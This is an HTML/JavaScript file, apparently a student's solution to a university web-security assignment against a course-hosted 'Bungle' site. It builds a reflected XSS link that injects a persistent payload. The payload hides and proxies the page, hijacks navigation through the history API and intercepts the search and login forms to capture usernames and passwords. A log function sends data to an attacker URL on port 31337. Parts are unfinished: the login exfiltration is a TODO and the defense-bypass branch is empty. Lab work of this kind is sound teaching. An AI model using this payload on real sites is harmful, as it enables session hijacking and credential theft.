xss

1. <meta charset="utf-8">
2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
3. <script>
4. function payload(attacker) {
5.  
6. function log(data) {
7. console.log($.param(data));
8. $.get(attacker, data);
9. }
10.  
11. function loadcallback() {
12. console.log("callback called");
13.  
14. $("html").show();
15.  
16. $('#bungle-lnk').removeAttr("href");
17. $('#bungle-lnk').click(function() {
18. proxy('/', history.state['url'] != '/');
19. });
20.  
21. $('#search-again-btn').removeAttr("href");
22. $('#search-again-btn').click(function() {
23. proxy('/', true)
24. });
25.  
26. $('.history-item').each(function() {
27. var value = $(this).attr('href');
28. $(this).removeAttr('href');
29. $(this).click(function () {
30. proxy(value, true);
31. });
32. });
33.  
34. // hijack search form
35. $('#search-btn').click(function(e) {
36. e.preventDefault();
37. var attr = $("#query").val();
38.  
39. // log to attacker
40. console.log("search clicked");
41.  
42. // fill in page
43. $.ajax({
44. url: "./search",
45. data: {
46. q: attr
47. },
48. type: "GET",
49. success: function (data) {
50. $("html").html(data);
51. proxy("search?q=" + attr, true);
52. }
53. });
54. });
55.  
56. // problem 1: click twice for search
57. // problem 2: going back and forward is searching!
58.  
59. $('#log-in-btn').click(function(e) {
60. e.preventDefault();
61. var un = $('#username').val();
62. var pw = $('#userpass').val();
63.  
64. //TODO: log to attacker
65. console.log("btn clicked: " + un + ", " + pw);
66.  
67. $.ajax({
68. url: "./login",
69. data: {
70. username: un,
71. password: pw,
72. },
73. type: "POST",
74. success: function (data) {
75. $("html").html(data);
76. proxy("/");
77. }
78. });
79. });
80. }
81.  
82. function proxy(href, shouldPush) {
83. console.log('proxy called');
84.  
85. // add appropriate url to the history stack
86. if (shouldPush) {
87. $("html").load(href, function() {
88. loadcallback();
89. history.pushState({url: href, html: $("html").html()}, "", href);
90. });
91. }
92.  
93. else {
94. $("html").html(history.state["html"]);
95. loadcallback();
96. }
97. }
98.  
99. // do this on first injection
100. $("html").hide();
101. $(document).ready(function() {
102.  
103. // load script to the page
104. var script = document.createElement('script');
105. script.type = "text/javascript";
106. script.text = "var attacker = '" + attacker + "';\n" + proxy.toString() + "\n" + log.toString() + "\n" + loadcallback.toString();
107. $("html").append(script);
108.  
109. // popstate hander
110. window.onpopstate = function(e) {
111. proxy(e.state['url'], false);
112. };
113.  
114. // initial history and page setup
115. history.replaceState(null, "", "/"); // avoid flashing link
116. $("html").load("/", function() {
117. loadcallback();
118. history.replaceState({url: "/", html: $("html").html()}, "", "/");
119. });
120. });
121. }
122.  
123. function makeLink(xssdefense, target, attacker) {
124. if (xssdefense == 0) {
125. return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<\/script" + ">");
126. } else { // Implement code to defeat XSS defenses here.
127. }
128. }
129. var xssdefense = 0;
130. var target = "http://cos432-assn3.cs.princeton.edu/";
131. var attacker = "http://127.0.0.1:31337/stolen";
132. $(function() {
133. var url = makeLink(xssdefense, target, attacker);
134. $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
135. });
136. </script>
137. <h3>parse error</h3>